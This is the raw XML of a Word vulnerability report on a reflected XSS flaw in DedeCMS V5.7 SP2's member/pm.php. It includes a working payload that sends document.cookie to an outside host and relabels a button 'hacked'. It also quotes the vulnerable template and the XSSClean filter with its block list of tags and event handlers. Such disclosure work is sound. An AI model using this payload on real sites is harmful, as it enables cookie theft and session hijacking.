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AFF54" w14:textId="77777777" w:rsidR="00B761B5" w:rsidRDefault="00B761B5" w:rsidP="00B761B5">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Reflected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00493ED7">
        <w:t>XSS Vulnerability exists in the file of DedeCMS V5.7 SP2 version, which can be executed javascript code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB22052" w14:textId="77777777" w:rsidR="00B761B5" w:rsidRDefault="00B761B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028EA55C" w14:textId="77777777" w:rsidR="00B761B5" w:rsidRDefault="00B761B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="356A7D69" w14:textId="77777777" w:rsidR="00B761B5" w:rsidRDefault="00B761B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload</w:t>
      </w:r>
      <w:r w:rsidR="00CF32A7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5159E775" w14:textId="77777777" w:rsidR="00CF32A7" w:rsidRDefault="00CF32A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01115AD6" w14:textId="77777777" w:rsidR="00B761B5" w:rsidRDefault="00CF32A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF32A7">
        <w:t>/member/pm.php?folder=inbox%26apos%3b%26amp%3b%26[window.GetCheckfolderItem=[document[%26apos%3bimages%26apos%3b][0].src=%26apos%3bhttps://www.sysorem.xyz/wp-content/uploads/images/32.jpg?%26apos%3b%2bdocument.cookie]]%26%26[document.forms[0][1].textContent=%26apos%3bhacked%26apos%3b]%26%26%26apos%3b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D6635D" w14:textId="77777777" w:rsidR="00CF32A7" w:rsidRDefault="00CF32A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68AEB349" w14:textId="77777777" w:rsidR="00CF32A7" w:rsidRDefault="00CF32A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1120EE52" w14:textId="77777777" w:rsidR="00B761B5" w:rsidRDefault="00CF32A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF32A7">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E19A564" wp14:editId="08EAB0B1">
            <wp:extent cx="5727700" cy="269875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38613" w14:textId="77777777" w:rsidR="00B761B5" w:rsidRDefault="00B761B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="001B48EB" w14:textId="77777777" w:rsidR="00B761B5" w:rsidRDefault="00B761B5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C913D2" w14:textId="77777777" w:rsidR="00804968" w:rsidRDefault="00CF32A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">when clicked the button titled </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>删除选中</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00804968">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00804968">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>we could catch the request as below &amp; the button</w:t>
      </w:r>
      <w:r w:rsidR="00804968">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00804968">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">s title would turns to </w:t>
      </w:r>
      <w:r w:rsidR="00804968">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="00804968">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hacked</w:t>
      </w:r>
      <w:r w:rsidR="00804968">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00804968">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0A3ED4" w14:textId="77777777" w:rsidR="00804968" w:rsidRDefault="00804968">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4618FD38" w14:textId="77777777" w:rsidR="00804968" w:rsidRDefault="00804968">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00804968">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E893518" wp14:editId="60C6956F">
            <wp:extent cx="5727700" cy="1632585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71BA5" w14:textId="77777777" w:rsidR="00804968" w:rsidRDefault="00804968">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56AC5BA9" w14:textId="77777777" w:rsidR="00CF32A7" w:rsidRDefault="00804968">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D45509E" w14:textId="77777777" w:rsidR="00804968" w:rsidRDefault="00804968">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5732784A" w14:textId="77777777" w:rsidR="00804968" w:rsidRDefault="00804968">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463DA63E" w14:textId="77777777" w:rsidR="00804968" w:rsidRDefault="00804968">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="461F7FED" w14:textId="77777777" w:rsidR="00804968" w:rsidRDefault="00804968">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="417B740D" w14:textId="77777777" w:rsidR="00D43556" w:rsidRDefault="00D43556">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>File:</w:t>
      </w:r>
      <w:r w:rsidR="00804968" w:rsidRPr="00804968">
        <w:t>member/pm.php</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (begin with line 215)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381FDF1B" w14:textId="77777777" w:rsidR="00D43556" w:rsidRDefault="00D43556"/>
    <w:p w14:paraId="39BED41E" w14:textId="77777777" w:rsidR="00D43556" w:rsidRPr="00D43556" w:rsidRDefault="00D43556" w:rsidP="00D435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Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D43556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else</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43556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{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$wsql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 `fromid` ='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{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$cfg_ml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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43556">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1948A6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
        </w:rPr>
        <w:t>M_ID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}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 AND folder LIKE 'outbox'"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$tname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已发信息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>}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$query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"SELECT </w:t>
      </w:r>
      <w:r w:rsidRPr="00D43556">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="658ABA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
        </w:rPr>
        <w:t>*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 FROM `#@__member_pms` WHERE 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$wsql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 ORDER BY sendtime DESC"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$dlist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D43556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new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DataListCP();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$dlist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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43556">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1948A6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
        </w:rPr>
        <w:t xml:space="preserve">pageSize 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D43556">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
        </w:rPr>
        <w:t>20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$dlist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-&gt;SetParameter(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"dopost"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$dopost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$dlist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-&gt;SetTemplate(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43556">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="1948A6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
        </w:rPr>
        <w:t>DEDEMEMBER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D43556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'/templets/pm-main.htm'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$dlist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-&gt;SetSource(</w:t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$query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D43556">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="660000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
        </w:rPr>
        <w:t>$dlist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-&gt;Display();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DC5D69" w14:textId="77777777" w:rsidR="00D43556" w:rsidRDefault="00D43556"/>
    <w:p w14:paraId="68F86F2A" w14:textId="77777777" w:rsidR="00D43556" w:rsidRDefault="00D43556"/>
    <w:p w14:paraId="1DCD9F49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SetTemplate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 was used to load the template named pm-main.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7464851D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4F53A252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5686F622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129D6819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3BAF3038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4AD9A378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File:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D43556">
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
        </w:rPr>
        <w:t>member/templets/pm-main.htm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(line 144)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A61053E" w14:textId="77777777" w:rsidR="00D43556" w:rsidRDefault="00D43556" w:rsidP="00D43556">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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&lt;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EFEFEF"/>
        </w:rPr>
        <w:t xml:space="preserve">div </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0055FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
        </w:rPr>
        <w:t>class=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 xml:space="preserve">"control fLeft doPost" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0055FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
        </w:rPr>
        <w:t>style=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>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0055FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>margin-top</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="658ABA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>px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>"</w:t>
      </w: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&gt;&lt;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EFEFEF"/>
        </w:rPr>
        <w:t xml:space="preserve">button </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0055FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
        </w:rPr>
        <w:t>type=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 xml:space="preserve">"button" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0055FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
        </w:rPr>
        <w:t>onclick=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>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DoSubmit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21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</w:rPr>
        <w:t>'&lt;?php echo $folder; ?&gt;'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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 xml:space="preserve">" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0055FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
        </w:rPr>
        <w:t>class=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EFEFEF"/>
        </w:rPr>
        <w:t>"greenBtn3"</w:t>
      </w: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&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>删除选中</w:t>
      </w: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&lt;/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EFEFEF"/>
        </w:rPr>
        <w:t>button</w:t>
      </w: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&gt;&lt;/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EFEFEF"/>
        </w:rPr>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFEFEF"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1712DC6A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499E8D86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62A81E4D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669F5AE5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0A6EE4C0" w14:textId="77777777" w:rsidR="00D43556" w:rsidRDefault="00D43556">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4A6042" w14:textId="77777777" w:rsidR="00D43556" w:rsidRDefault="00D43556"/>
    <w:p w14:paraId="4F5B9AE5" w14:textId="77777777" w:rsidR="00D02411" w:rsidRDefault="00D02411">
      <w:r>
        <w:t xml:space="preserve">Filter function called </w:t>
      </w:r>
      <w:r w:rsidR="008D3949">
        <w:t>XSSClean defined in the file name config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085211A5" w14:textId="77777777" w:rsidR="00D02411" w:rsidRDefault="00D02411">
      <w:r>
        <w:t xml:space="preserve">File: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D02411">
        <w:t>member/config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7BA13C" w14:textId="77777777" w:rsidR="003526E1" w:rsidRDefault="003526E1" w:rsidP="003526E1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pP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&lt;?php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/**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* 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t xml:space="preserve">@version       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$Id: config.php 1 8:38 2010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年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7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月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9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日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Z tianya $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* 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t xml:space="preserve">@package       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DedeCMS.Member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* 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t xml:space="preserve">@copyright     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Copyright (c) 2007 - 2010, DesDev, Inc.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* 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t>@license        http://help.dedecms.com/usersguide/license.html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br/>
        <w:t xml:space="preserve">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 xml:space="preserve">* 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t>@link           http://www.dedecms.com</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="808080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">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*/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>//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针对会员中心操作进行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XSS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过滤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function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XSSClean(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global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$cfg_soft_lang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if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$cfg_soft_lang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'gb2312'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gb2utf8(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is_array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))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// while (list($key) = each($val))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foreach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as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$key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=&gt;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$value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if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in_array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$key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array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'tags'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'body'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'dede_fields'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'dede_addonfields'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'dopost'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'introduce'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)))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continue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$key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 = XSSClean(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$key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return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preg_replace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'/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/'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$search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'abcdefghijklmnopqrstuvwxyz'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$search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'ABCDEFGHIJKLMNOPQRSTUVWXYZ'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$search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'1234567890!@#$%^&amp;*()'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$search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'~`";:?+/={}[]-_|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\'\\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for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&lt;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strlen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$search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++)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preg_replace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'/(&amp;#[xX]0{0,8}'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dechex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ord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$search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])).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';?)/i'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$search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);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// with a ;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preg_replace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'/(&amp;#0{0,8}'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ord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$search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]).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';?)/'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$search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); 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t>// with a ;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="80808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"`"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"‘"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"'"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"‘"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\"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"“"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","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，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"("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（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")"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）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$ra1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array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'javascript'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'vbscript'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'expression'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'applet'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'meta'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'xml'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'blink'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'link'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'style'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'script'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'embed'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'object'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'iframe'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'frame'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'frameset'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'ilayer'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'layer'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'bgsound'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'title'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'base'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$ra2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array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'onabort'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'onactivate'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'onafterprint'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'onafterupdate'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'onbeforeactivate'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'onbeforecopy'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'onbeforecut'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'onbeforedeactivate'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'onbeforeeditfocus'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'onbeforepaste'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'onbeforeprint'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'onbeforeunload'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'onbeforeupdate'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'onblur'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'onbounce'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'oncellchange'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'onclick'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'oncontextmenu'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'oncontrolselect'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'oncopy'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'oncut'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'ondataavailable'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'ondatasetchanged'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'ondatasetcomplete'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'ondblclick'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'ondeactivate'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'ondragend'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'ondragenter'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'ondragleave'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'ondragover'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'ondragstart'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'ondrop'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'onerror'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'onerrorupdate'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'onfilterchange'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'onfinish'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'onfocus'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'onfocusin'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'onfocusout'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'onhelp'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'onkeydown'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'onkeypress'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'onkeyup'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'onlayoutcomplete'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'onload'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'onlosecapture'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'onmousedown'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'onmouseenter'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'onmouseleave'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'onmousemove'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'onmouseout'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'onmouseover'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'onmouseup'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'onmousewheel'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'onmove'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'onmoveend'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'onmovestart'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'onpaste'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'onpropertychange'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'onreadystatechange'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'onreset'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'onresize'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'onresizeend'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'onresizestart'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'onrowenter'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'onrowexit'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'onrowsdelete'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'onrowsinserted'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'onscroll'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'onselect'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'onselectionchange'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'onselectstart'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'onstart'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'onstop'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'onsubmit'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'onunload'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$ra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array_merge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$ra1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$ra2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$found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true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;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while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$found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==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true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$val_before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for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&lt;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sizeof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++)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for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$j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$j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&lt;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strlen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]);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$j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++)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$j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&gt;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'('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'(&amp;#[xX]0{0,8}([9ab]);)'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'|'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'|(&amp;#0{0,8}([9|10|13]);)'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')*'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$j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];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$pattern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.= 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'/i'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$replacement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substr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],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2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).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'&lt;x&gt;'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substr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$ra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$i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], </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
        </w:rPr>
        <w:t>2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preg_replace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$pattern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$replacement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,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);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$val_before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==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{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  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$found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false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if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$cfg_soft_lang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'gb2312'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 utf82gb(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return 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$val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>}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$_GET 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= XSSClean(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Menlo" w:hAnsi="Menlo" w:cs="Menlo"/>
          <w:color w:val="660000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F7FAFF"/>
        </w:rPr>
        <w:t>$_GET</w:t>
      </w:r>
      <w:r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</w:p>
    <w:p w14:paraId="54E560C6" w14:textId="77777777" w:rsidR="003526E1" w:rsidRDefault="003526E1"/>
    <w:p w14:paraId="7EBE6DEF" w14:textId="77777777" w:rsidR="003526E1" w:rsidRDefault="003526E1">
      <w:r>
        <w:t>….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8C5A24" w14:textId="77777777" w:rsidR="003526E1" w:rsidRDefault="003526E1"/>
    <w:p w14:paraId="256AFBB5" w14:textId="77777777" w:rsidR="003526E1" w:rsidRDefault="003526E1"/>
    <w:p w14:paraId="1447266C" w14:textId="77777777" w:rsidR="003526E1" w:rsidRDefault="003526E1"/>
    <w:p w14:paraId="0899C4A5" w14:textId="77777777" w:rsidR="003526E1" w:rsidRDefault="003526E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Obviously ,</w:t>
      </w:r>
      <w:r w:rsidR="008D3949">
        <w:t>the payload bypassed the fileter function .</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D3949">
        <w:t xml:space="preserve">Attackers can </w:t>
      </w:r>
      <w:r w:rsidR="008D3949">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hijack the Click event by the I</w:t>
      </w:r>
      <w:r w:rsidR="008D3949">
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="008D3949">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rame Click Hjiack and ect.</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="003526E1" w:rsidSect="00335E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B5"/>
    <w:rsid w:val="002A6130"/>
    <w:rsid w:val="002A7ABE"/>
    <w:rsid w:val="00335E20"/>
    <w:rsid w:val="003526E1"/>
    <w:rsid w:val="00510785"/>
    <w:rsid w:val="00804968"/>
    <w:rsid w:val="008D3949"/>
    <w:rsid w:val="00B761B5"/>
    <w:rsid w:val="00CE0E49"/>
    <w:rsid w:val="00CF32A7"/>
    <w:rsid w:val="00D02411"/>
    <w:rsid w:val="00D4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C327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6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3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355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773</Words>
  <Characters>4411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2018-10-22T13:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-22T14:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>